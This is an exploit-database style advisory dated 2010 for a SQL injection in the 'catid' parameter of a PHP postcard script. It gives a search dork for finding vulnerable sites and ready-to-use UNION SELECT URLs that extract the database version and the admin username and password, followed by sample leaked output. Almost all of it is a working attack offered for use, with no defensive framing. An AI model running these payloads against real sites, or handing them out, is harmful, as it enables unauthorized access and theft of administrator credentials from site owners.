post Card - 'catid' SQL Injection

Author: Hussin X
type: webapps
platform: php
port: 
date_added: 2010-03-25 
date_updated:  
verified: 1 
codes: OSVDB-63280 
tags: 
aliases:  
screenshot_url:  
application_url: 

post Card ( catid ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.iqs3cur1ty.com<http://www.iqs3cur1ty.com> & www.iq-ty.com<http://www.iq-ty.com>

MaiL : darkangeL_G85@Yahoo.CoM
___________________________________

script : http://webbdomain.com/php/postcarden/index2.php
script : http://webbdomain.com/php/postcardir/index2.php
version : all
DorK : inurl:choosecard.php?catid=
_____

ExploiT & Demo
_______


version :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+version%28%29,555555555555,6666666666666666666+from+admin--

user & pass :

http://webbdomain.com/php/postcardir/choosecard.php?catid=-1+uniOn+select+concat%28username,0x3a,password%29,555555555555,6666666666666666666+from+admin--



Note : Exploit in Source page

Example :

<td><a style="text-decoration:none" href='chosencard.php?id=5.0.89-community // << version :D

<td><a style="text-decoration:none" href='chosencard.php?id=admin:admin' // << here user and pass